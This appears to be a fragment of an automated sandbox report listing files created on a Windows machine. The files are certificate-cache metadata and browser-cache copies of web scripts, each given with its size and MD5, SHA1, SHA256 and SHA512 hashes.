MD5c71b457cf71f98f0de57c7de17d01d20
SHA1129d257fc5878753e1ad4d508d13f98f12fc4a95
SHA256712dc8d6fe1f32fcb77bd13ddea14edd0dd2352fd061cddc50d87a3f6814e9ed
SHA512f8e9b2aa6297803b285d84a98c5bb41a29cf9729e141503730380c7c77c02f47fc97c95bd2a1413e7da5836fc540696a2a91d79693e7667ffb2dab0b338f1fd0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ef0aea2ddd3b8e923e1e77135ba507fc
SHA1f30af198ca194593b8031c8ce009bc987d139c89
SHA256d044bce802b1e96b1c6c307c67cb4a9f19ffc6ace9c2250f44845ef9b4330cac
SHA512d2da2c270c69fa2824e51f653e7d39000acef322925895972a2305e9758117ff204f4698af27c24a409c55a990467d768000a70a8f5bcd4cfc1f43e45aeff00a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c02aa68e27000c0c8a414ba5daa67995
SHA1a87e0223ebc5fecacadbb255ca93ed5db0cff356
SHA25657e333769d92f5ee09a935955970faabb45edc56988b8159016c45d5c945576c
SHA51242c8ecc8acb131b14986ca304f7e27f91d175cf8ca620aa6563b0410dd69318ab983419848a8bef42a1fe1e0c3b8f53deecdfdf8a6aa1ff14f68e18615701c94
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f1da3d8784d9f7df3e16b64de17efd5f
SHA13943f8b9b5e4294b9e8c382709aa21963b7b462e
SHA25601dbab416f247b37e66c95968924a19bc88d07a1807b8df52b21cef07bdbc893
SHA51257429eac73949bcf34b236201d2b7c0ff85da71806fb3d79d45f2fc5097dfb4baea279c15137325d7d5e9c17e25a358aeef3c7e05d6129c72222a0ba99a1a6e4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c89a854ddb38ab4821f6b07390c47029
SHA1dc8d6a7e4a2a0fb38327ca39f7b5555b65cc8780
SHA256c4e4c0e92e7a59cdeb2afe1eb37da21d368fa0849a00eea0eb2071e3a22f573b
SHA5127bc357f60398e8a425cda79580bcb88940e5f6cd7a621b1f66251ac80a3ab7faaed3158d6bb066f09bb6b3bcb0f4234fa7f43ddabdf03869e7cbd862d40fe7af
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c50abaef671546dd79656adbf00ba85a
SHA189cb7e7194a4d5eb8cbf5db675e5bd3a81aa66b1
SHA256692d619d86be0615a79865fbbd7023d6d89f39d2b85f09d48adbb324873c0043
SHA5120428af488149b489270ffa47b3c2975f885d7363610c4d6957eb4e8e99a960e17e6d94d020705e203728ac35f6d1d3fa6a2a8b8294ea5809281f1307e1f3208f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD514f63629487eabfe55f4752ae1135c8b
SHA170649e9250576ebf003e98955f25730b96f9a555
SHA2568dd14f7860da0b43e20018e79deb52c76a6133c4a6a892c561f46e67b5e7817c
SHA51210ca262734e51d91ea1e5a5869243378e9cc0e47075ec3ebd0fe140f0c906bd80f514b548c6817773adf143250a2d8257dac78820b88a36182e57e50a951db5d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD543271f1094e2e8c3262bfe4c071d5874
SHA1ef8acc670278d3d3ab0f22a2049ed708a239d2ea
SHA256c71ce432647e0f1c415a507564e34bebe2d6ee657e8dbf0e28d4345d8ce98520
SHA5127bcfacb10f39644879ddfd689bee6a64591d424d1c957491c6fb85a5a1df6b6d964dbe92a874d7b0736d7ab95ac4580c00d4ea3a817583c75dab3fdbf57f489e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5562669bacab23ff778f188d3ddfde056
SHA1a21999c499d6f979a1d52669828be3f866985ea2
SHA256703c352ee9bd2bc72fdfb17984e3cb7bed33e58445048f3e9f85acb5f1a3fb14
SHA5127dd45765a3c276dd008c959eb3c74bab09dabeecfc7663bcd732e528f645fd8549f770b5e01e485cff8841a4978d05d63fe62d7ca71e111561a7e7e71ddc06eb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD544d0ade2e1c8773c1b73664314176ead
SHA1880d179bbcf892ba506a9b3b32110736e84cd79e
SHA256b5bc275fe0ac1110a78bad82c55641a6b1fd26edcd5c81d0c678f4fb703b710a
SHA512c776d1d0e955bdb2d624c64572ea347245c47bd3781e5b30c005b58b271393e92e2acf4172b4f65dfa694ea8b42b2cce35850b1347977199eeb9cf132c5d7fe3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59a49d7be0c4e4efe99579b61354d24aa
SHA1d26df635d0117a1545ecc7c12210a216cbb9275a
SHA25640b24f2fac91366d2a98a3464a9dfc0a972c4040e46997e95817274a0f18df2e
SHA5122868c4058b554c3bde1b82da2b83f02f1c104167c58ce055fa8db58fc85ff38d3b70c12a2fbdb0a65d88b4c4615c54a0dd1a40127ac81dd1c8e4fe36a2dd7ced
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD532c37f7635db7ece6a1c1b2808228bad
SHA189f439913c2f09c4f91fb7e048b128810e32dc6c
SHA2561e1f819af48af34a961294d9641611658ff834d631bb105962c82eb444859f87
SHA51247ed694c77127523837b64b02c520fe38a2f5ca9a31d0b954b6a0225ae18e0f258674d399d071217f2300d2b01dffb094ed118d8b83c5fd56560d168eb0f6651
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5fd08f275145c1a6197f187f721987a62
SHA1dc73d85f9fe63c5a926e8ca0a4b2c53d6699791e
SHA25618d34c7c777fd1a193cda79d26ba16fe58a47abe37957b4461292da3a44a4ade
SHA512ba27992d6585be6ca083bb51b6d835961ba9e6aeb900a7ab5909d52d460d69b4c62f2792258595fe1d4a5ce31d4f499655b16a35a6b8d118fc399156be751131
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52d21bc75990773a55e46d43e39d49ba8
SHA1635aff8f501c0a526bf515b33e6f8d981153e5c1
SHA25664189f2d249c94bcdc547af019a482d2268bbaee29a20d8cb57847c895bfc03b
SHA5124f22174b6d42e4ffb77e7a716da46639bbc389513c93b9af5a1809d0ed3b248e00a7e064c0c80daf80ed440a7a23568106d5e63ff1d393cb64ae4eb59e2bfaaa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50eed68c780506b86e1e6e5218825b2e5
SHA13c432bdec2da16e4b39ecd439159ead4f2756684
SHA256beba3a82ba14b415a43929ba97ddb42ccb8ab70ab60a249772c60f50c0bf24f5
SHA5129b5f88fe34d1410a849092c1f98dec77ea6dcf1e419c312274148c381612d34a9da542f39e5d326af0ee3898f9fd5a99a0eff2936b683c3db3881f221375c09c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5998694bf3459a530fc65ed1d9ec7f0d2
SHA1a5a7d6b2fe3c48df030377726bf30f7d4944d1a0
SHA25671915b224af1251b3a012547f0235870b9ea86894c5767403df6d5a5b7f60a7c
SHA5129b6111e1bb9ac2cc35ca89f21b6b89110f84cbc7507487cbbfd8a23d0454c1f1f7db259d696910638fe5e6bbee00d1f03455be8bf3321724634bef2820932eab
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD534c0ffbdea6de4af51d9092c81f48946
SHA1c884f2f1630d143d08e602688964250ea9b77b05
SHA2568b9bda2309df7a4523d230f18b0a61d94651207ac284551713d56540d264209c
SHA5121740c7406052eae6fb3fb5b0aa07968602a66ef67b7b6e33513b21be0c7477a2a8ee259ee4eb4a814a2d0fae9c64f1cdf2ddc062287e0d92b893813b3ee3e22f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b8fa2248ac8babdbe04a30d553072cfd
SHA182c71872ec4784d1b48f753050b49a07432b7737
SHA25605f608bb2ff1e5e758d1b22924057d2ccfbaa2824b229540615394377bbc3b40
SHA512812e9e6fa30622cb4e98a6a61f61c3164fd3aa8dd40bc88609b51520efabfd12af32bb92e477c06a3fb3a6f102fce0999ecf34aee29a696d314708fab3c7ab00
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5630d6860e317e126ffb959bef63dcb46
SHA1b67651f8cf8335d5056fcab1e0c32e6167a3c28a
SHA256ff12d0501a7cba7054c57c0caf9833be0a8c97e1b394c0b52a268636080365c1
SHA512a21850975b599a044809364f18245a640b11413139645bfe480a4025387409a5bb1da5c1767302cf2b615b2bf1f5a1da77ad5c5b476106863b0ad7d85082415e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5cd3ec1c7e7393aa00af022752ad85d65
SHA1886dbc8919939c237fe867a6b97d7187c83f9481
SHA2560c07d3e1e476b97034bad2a04e39a04484026f5e5961880be27f92c1978873c6
SHA5126937a3dd14fd5f8f358cc58507122301bc1c522035ba8e13b031cdc3218b0e933b5e8add7e54e227514c08da6f92e5b3a0ab8e97d3eb6fca6cfa560e117321d9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\fresco[1].htm
Filesize124B
MD58df8b85bba5eb9ebebda6507c72c296a
SHA1bb55b38da20e01f137d2f3862dc1838f04c96fa8
SHA256eb87a88b50fa694627abda5d64b0ba599293a9e55647a170398e6e9de75977d7
SHA512b7fdc357172e3f6f9107642af1b7db1c0a8834ce0a0372ecf9bef4dea7aca637bdae9bac7a397781f61b0f13a8724c4648d8d16f7e90bb19c65499c7628b55ff
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\jquery.themepunch.tools.min[1].htm
Filesize124B
MD5a5f48b8e96d1aa79ffbf52cd08f1a6b6
SHA1e06ffbf45f74efa118a27891224c6bc3bd15bb62
SHA25625537a1aa19853c5bdc59b69a9b647a218a31f3d2f693a92dd8df5e3d11edd42
SHA5128324bb88d81a004306acb4d590755d8f87dacaf015aa75b1652b2393556abfee7bb119da604b4bd56900dbf83a5a438ec026d7aa3c83a818c905dae0631016a6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\scripts[1].htm
Filesize122B
MD5c495a59b6feea64c19db0117bf123ec6
SHA1bab3e3207424226994cd9d0525e4a200da2e239a
SHA2566788de5bab06fb0e7fa4e8e37e6c32be8908ae4799ba7f6c202ed30494e16604
SHA5125f544da102accde4dfc5a69ba3f2ea8f84b0ff5fa0a3d3bbd638c76b91190dd4a16a473d56c20330ea225a13d4671fa793bdb454d9fb42c439f7f30f8f71b38a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\select2.min[1].htm
Filesize124B
MD5ead3c28a18f55b03bb636de7cb280484
SHA1cf387e6fa397278342a74259ab85a1c9526e8d20
SHA256cf51f2e03ef02c810169b867f97b2a1d62060f8e1d8487d440ac94215d0962c1
SHA512de2e4da503f19519b21b6997fb984300b1df6a9e763d47e606d3ee570a072174ac7ef21e00ae07beffeab332cfae362a5d58d27d21e191a5251e6433929c41c9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\easyzoom[1].htm
Filesize122B
MD500d64a82ba2d055e5facd3a30efac924
SHA1308e275068e3bec5effca608fe9df2008c979650
SHA256aaa3feed097fda6687c7c27860c24980f3ff105b6f326d10c98854145e9afa6b
SHA5121151e227086964ec19c11eb388ace411a56a6e1da96409b2bfdb5313fb5df75223add437a653decf3afdfbd2be2cde421c512f9de423ad74f2ebbaf81119d8fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\jquery.nanoscroller.min[1].htm
Filesize124B
MD546da0c2bcb668c81c4aee109df751b2d
SHA1af88edf5b2d191f25859b454bb967300c98a7685
SHA256d18a486617d487797aa2751e8046c800f83b054b528746e3dffba009a8ced271
SHA512e3f5834dab8574ddae5224e2d77b3b6f24dd3029ddbadb8605daec17ebc6fcbcc3eb1e894ac90db9405c726cc98b754d39bac5fc9a6a329b34fd82ebfe438e22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IW68H88T\owl.carousel.min[1].htm
Filesize124B
MD5e6fb351c7f8d27671239f5e8d09db930
SHA12ec4be6010b3b6d7a4c24c35fe1b72316d4d967c
SHA256014d3d06512a15a4c6079573cb4ed34e60467828742db1a8514c398ac3a63d89
SHA51214ab93fa7b9b9cda8b9af21b1d075d20e7b1bcf9c03d36e57021431774c32b21e4f8526b71bdb028b25f802009d039eda912b39c182897f77243c8ceaf7eb13d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NVDR4C1U\foundation.interchange[1].htm
Filesize124B
MD515682ef8b101b7a3b980deadf178734c
SHA1f878e3160f7dae0d2cbb657beec98ebf53f171f8
SHA256e249f90999b4e2a48741210781997bcb214aaf3079dc9b01b26a5b6d9d28031e
SHA512794d298890a418bd0039e6da1f7f9569823cba3a010bd2d914bff1bca31b35fb12292b7bfc0fe0d8c2b55c1c783d57ffa75c310785d47eef013e186c6144debc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NVDR4C1U\style[2].htm
Filesize125B
MD5aa80f4da71c08898b1031c9c5e77ca67
SHA1938c3e211b6def64bd4c4b9f3e64dc39556f9f4e
SHA256268c69f55f5f3dbcff58fa64e9a653c5be2e1893e41ac875ce413e9d4af3f67c
SHA5127bca024ca3a48c96dfd9b5c6449f916c3aaafe54a04da15f8c78ab5863b944900bee1ebb13c25f75495b4fbe7ffc725c5d8271af4b47ec7307999ee0cf512392
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a